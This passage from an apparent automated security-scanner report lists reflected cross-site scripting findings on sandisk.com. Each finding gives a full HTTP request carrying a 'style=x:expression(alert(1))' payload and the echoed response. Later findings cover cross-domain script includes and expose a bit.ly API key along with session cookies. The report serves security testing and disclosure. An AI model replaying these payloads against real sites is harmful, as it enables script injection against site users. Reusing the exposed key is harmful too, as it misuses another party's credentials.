This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/micromate-sdhc?91afa"style%3d"x%3aexpression(alert(1))"f06b3bb7095=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25367
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:45:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/micromate-sdhc?91afa"style="x:expression(alert(1))"f06b3bb7095=1?tab=review">
...[SNIP]...

1.29. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-extreme-20-usb-readers

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d213"style%3d"x%3aexpression(alert(1))"733037f334 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d213"style="x:expression(alert(1))"733037f334 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-extreme-20-usb-readers?9d213"style%3d"x%3aexpression(alert(1))"733037f334=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25906
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-extreme-20-usb-readers?9d213"style="x:expression(alert(1))"733037f334=1?tab=review">
...[SNIP]...

1.30. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-extreme-firewire-reader

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18e23"style%3d"x%3aexpression(alert(1))"68aef6c3757 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18e23"style="x:expression(alert(1))"68aef6c3757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-extreme-firewire-reader?18e23"style%3d"x%3aexpression(alert(1))"68aef6c3757=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26596
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-extreme-firewire-reader?18e23"style="x:expression(alert(1))"68aef6c3757=1?tab=review">
...[SNIP]...

1.31. http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-extreme-pro-expresscard-adapter

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29485"style%3d"x%3aexpression(alert(1))"f9fabd04fb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29485"style="x:expression(alert(1))"f9fabd04fb7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-extreme-pro-expresscard-adapter?29485"style%3d"x%3aexpression(alert(1))"f9fabd04fb7=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29365
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-extreme-pro-expresscard-adapter?29485"style="x:expression(alert(1))"f9fabd04fb7=1?tab=review">
...[SNIP]...

1.32. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76254"style%3d"x%3aexpression(alert(1))"e871555b17b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76254"style="x:expression(alert(1))"e871555b17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader?76254"style%3d"x%3aexpression(alert(1))"e871555b17b=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32161
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-all-in-one-usb-20-reader?76254"style="x:expression(alert(1))"e871555b17b=1?tab=review">
...[SNIP]...

1.33. http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c407"style%3d"x%3aexpression(alert(1))"ad0616e8fa4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c407"style="x:expression(alert(1))"ad0616e8fa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader?9c407"style%3d"x%3aexpression(alert(1))"ad0616e8fa4=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 31282
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/readers-accessories/sandisk-imagemate-multi-card-usb-20-reader?9c407"style="x:expression(alert(1))"ad0616e8fa4=1?tab=review">
...[SNIP]...

1.34. http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b680"style%3d"x%3aexpression(alert(1))"1c3a1238b36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b680"style="x:expression(alert(1))"1c3a1238b36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player?6b680"style%3d"x%3aexpression(alert(1))"1c3a1238b36=1 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53593
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:46:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a class="ajaxLink" href="http://www.sandisk.com/products/sansa-music-and-video-players/sandisk-sansa-clipplus-mp3-player?6b680"style="x:expression(alert(1))"1c3a1238b36=1?tab=review">
...[SNIP]...

2. Cross-domain script include  previous  next
There are 191 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


2.1. http://www.sandisk.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Accept: */*
Referer: http://metricstream.com/html/customers.htm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sandisk.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmb=1.4.10.1289949765; __utmc=1; __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28444
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.2. http://www.sandisk.com/PlayListXML/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /PlayListXML/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /PlayListXML/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.3. http://www.sandisk.com/SanDisk/US-eStore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/US-eStore

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SanDisk/US-eStore HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.4. http://www.sandisk.com/SanDisk/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/facebook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SanDisk/facebook HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.5. http://www.sandisk.com/SanDisk/linkedin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/linkedin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SanDisk/linkedin HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.6. http://www.sandisk.com/SanDisk/rss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/rss

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SanDisk/rss HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.7. http://www.sandisk.com/SanDisk/twitter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/twitter

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SanDisk/twitter HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.8. http://www.sandisk.com/SanDisk/youtube  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/youtube

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SanDisk/youtube HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.9. http://www.sandisk.com/about-sandisk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40542
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.10. http://www.sandisk.com/about-sandisk.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/sitemap
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40547
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.11. http://www.sandisk.com/about-sandisk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
